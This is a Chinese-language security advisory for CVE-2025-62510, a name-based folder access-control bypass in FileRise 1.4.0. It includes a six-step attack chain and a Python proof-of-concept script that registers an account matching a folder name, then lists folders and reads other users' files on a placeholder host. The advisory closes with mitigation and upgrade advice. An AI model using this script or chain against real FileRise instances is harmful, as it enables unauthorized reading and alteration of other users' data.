CVE-2025-62510 FileRise文件夹访问控制绕过漏洞

漏洞信息

漏洞编号

CVE-2025-62510

漏洞类型

访问控制绕过/信息泄露

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FileRise

漏洞概述

CVE-2025-62510是FileRise自托管Web文件管理器中存在的一个高危访问控制绕过漏洞。FileRise是一款支持多文件上传、编辑和批量操作的自托管Web文件管理工具。在版本1.4.0中，由于权限控制逻辑出现回归（regression），系统允许通过文件夹名称推断文件夹的可见性和所有权关系。低权限用户可以查看或与其用户名匹配的文件夹进行交互，在某些情况下甚至能够访问其他用户的内容。该漏洞的核心问题在于系统缺乏显式的每文件夹访问控制列表（ACL），而是隐式地根据文件夹名称与用户名的匹配关系来决定访问权限，这导致了严重的越权访问风险。该漏洞已在1.5.0版本中修复，新版本引入了显式的每文件夹ACL机制（包括所有者/读/写/分享/读自己等权限），并在列表、读取、写入、分享、重命名、复制/移动、压缩和WebDAV等所有相关路径上实施了严格的服务器端权限检查。该漏洞的CVSS 3.1评分为8.1，属于高危级别，攻击者通过网络即可利用，仅需低权限账号，无需用户交互，即可对系统的机密性和完整性造成高影响。

技术细节

该漏洞的技术根源在于FileRise 1.4.0版本中对文件夹权限的控制逻辑存在缺陷。系统原本应该为每个文件夹维护独立的ACL（Access Control List），但在1.4.0版本中，权限检查逻辑出现了回归，导致系统隐式地根据文件夹名称与登录用户名的匹配关系来判断用户是否有权访问该文件夹。

具体而言，当低权限用户登录系统后，系统在执行文件夹列表操作时，会检查文件夹名称是否与当前用户名匹配。如果匹配，则认为该用户对该文件夹拥有访问权限，从而绕过正常的ACL检查。攻击者可以创建一个用户名与目标文件夹名称匹配的低权限账号，然后利用该账号访问原本不应有权限的文件夹内容。

漏洞利用的关键路径包括：list（列表）、read（读取）、write（写入）、share（分享）、rename（重命名）、copy/move（复制/移动）、zip（压缩）以及WebDAV等所有文件操作接口。这些接口在1.4.0版本中均缺少严格的服务器端权限验证，仅依赖文件夹名称的隐式匹配逻辑。

修复方案在1.5.0版本中实现：系统引入了显式的每文件夹ACL，包含owners（所有者）、read（读权限）、write（写权限）、share（分享权限）、read_own（读取自己的内容）等细粒度权限字段，并在所有文件操作路径上实施统一的服务器端ACL检查，确保只有被显式授权的用户才能执行相应操作。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过公开信息或社工手段获取目标FileRise实例中已存在的文件夹名称或用户名信息，确定可利用的目标文件夹。

STEP 2

步骤2：注册恶意账号

攻击者在FileRise实例上注册一个低权限用户账号，用户名设置为与目标文件夹名称一致的内容，利用系统基于名称匹配的权限逻辑缺陷。

STEP 3

步骤3：登录系统

攻击者使用新注册的低权限账号登录FileRise系统，获取有效的会话凭证。

STEP 4

步骤4：枚举文件夹

攻击者通过API或Web界面调用文件夹列表接口，由于用户名与文件夹名匹配，系统错误地返回了本不应可见的文件夹列表。

STEP 5

步骤5：越权访问内容

攻击者利用list、read、write、share、rename、copy/move、zip及WebDAV等接口，读取、修改或窃取其他用户的文件夹内容，造成数据泄露和完整性破坏。

STEP 6

步骤6：权限提升与持久化

攻击者可能通过write或share接口修改文件夹内容或权限设置，实现更高级别的持久化访问，进一步扩大攻击影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62510 - FileRise Folder Access Control Bypass PoC
# This PoC demonstrates how a low-privilege user can access folders
# by matching their username to the folder name in FileRise 1.4.0

import requests

TARGET_URL = "http://target-filerise-instance.com"

# Step 1: Create a low-privilege account whose username matches
# the target folder name (e.g., "admin" or a known folder owner)
username = "admin"  # Match this to the target folder name
password = "AttackerPass123!"

session = requests.Session()

# Step 2: Register the malicious low-privilege user
register_data = {
    "username": username,
    "password": password,
    "role": "user"  # Low-privilege role
}
session.post(f"{TARGET_URL}/api/register", data=register_data)

# Step 3: Login with the crafted account
login_data = {
    "username": username,
    "password": password
}
session.post(f"{TARGET_URL}/api/login", data=login_data)

# Step 4: List folders - the folder matching the username will be visible
# due to the flawed name-based access control logic
response = session.get(f"{TARGET_URL}/api/folders")
print("[+] Folder list response:", response.json())

# Step 5: Access the folder contents that should not be accessible
response = session.get(f"{TARGET_URL}/api/folder/{username}/contents")
print("[+] Folder contents:", response.json())

# Step 6: Read files within the unauthorized folder
response = session.get(f"{TARGET_URL}/api/folder/{username}/file/secret.txt")
print("[+] File content:", response.text)

# Note: In FileRise 1.5.0+, explicit per-folder ACLs are enforced,
# and username matching no longer grants access. Upgrade to 1.5.0+.

影响范围

FileRise < 1.5.0

防御指南

临时缓解措施

在无法立即升级到1.5.0版本的情况下，建议采取以下临时缓解措施：1）审查并限制低权限用户的文件夹列表可见性，手动配置文件夹的访问权限；2）监控异常的文件访问行为，特别是低权限用户访问非自身文件夹的操作；3）暂时禁用WebDAV等可能受影响的接口；4）确保用户名与文件夹名称不重复，降低被利用的风险；5）尽快升级到1.5.0版本以获得完整的ACL保护。